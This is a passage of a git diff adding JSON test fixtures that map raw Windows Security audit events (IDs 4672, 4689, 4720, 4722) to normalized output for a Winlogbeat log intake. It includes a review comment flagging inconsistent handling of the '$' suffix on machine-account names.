:\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID 
d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
"0x40c158b6",
+ "SubjectUserName": "USER01-WIN$",
+ "SubjectUserSid": "S-1-2-3"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456",
+ "id": "11111111-aaaa-2222-bbbb-333333333333",
+ "name": "AGENT",
+ "type": "winlogbeat",
+ "version": "8.11.1"
+ },
+ "host": {
+ "name": "USER01-WIN.domain.priv"
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "user": [
+ "USER01-WIN"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "USER01-WIN"
+ },
+ "winlog": {
+ "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}",
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "USER01-WIN.domain.priv",
+ "event_id": "4672",
+ "keywords": [
+ "Succ\u00e8s de l\u2019audit"
+ ],
+ "logon": {
+ "id": "0x40c158b6"
+ },
+ "opcode": "Informations",
+ "process": {
+ "pid": 828,
+ "thread": {
+ "id": 27812
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "288206963",
+ "task": "Special Logon"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json
new file mode 100644
index 000000000..22840d53c
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4689.json
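Review bot: In the 4672 expected block the machine account `USER01-WIN$` is emitted as `"name": "USER01-WIN"` and `"user": ["USER01-WIN"]` with the trailing `$` stripped, whereas the 4625 fixture earlier in this commit keeps it (`"name": "WORKSTATION$"`), and the 4689 fixture strips it again (`ACCOUNT_01`). Two normalizations of the same `SubjectUserName` field mean a rule that distinguishes computer accounts by `user.name` ending in `$` behaves differently per event ID, and `related.user` loses the one marker that lets an analyst tell a host account from a human one at a glance. I cannot see which parser branch each event ID takes, so this may be two code paths rather than an intended difference; either way the fixtures should agree on one form, and the intake documentation should state it in one line (`user.name` keeps, or strips, the `$` suffix of computer accounts).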
@@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": 
"winlogbeat",
+ "version": "8.11.1"
+ },
+ "host": {
+ "name": "ACCOUNT_01.domain.priv"
+ },
+ "log": {
+ "level": "information"
+ },
+ "process": {
+ "executable": "C:\\Windows\\System32\\process.exe",
+ "name": "process.exe",
+ "pid": 7672
+ },
+ "related": {
+ "user": [
+ "ACCOUNT_01"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "ACCOUNT_01"
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "ACCOUNT_01.domain.priv",
+ "event_id": "4689",
+ "keywords": [
+ "Succ\u00e8s de l\u2019audit"
+ ],
+ "logon": {
+ "id": "0x3e7"
+ },
+ "opcode": "Informations",
+ "process": {
+ "pid": 4,
+ "thread": {
+ "id": 620
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "1564712",
+ "task": "Process Termination"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json
new file mode 100644
index 000000000..03a0543f5
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4720.json
@@ -0,0 +1,127 @@ +{ + "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-
Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": 
"0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..99debf8cf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json 
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A 
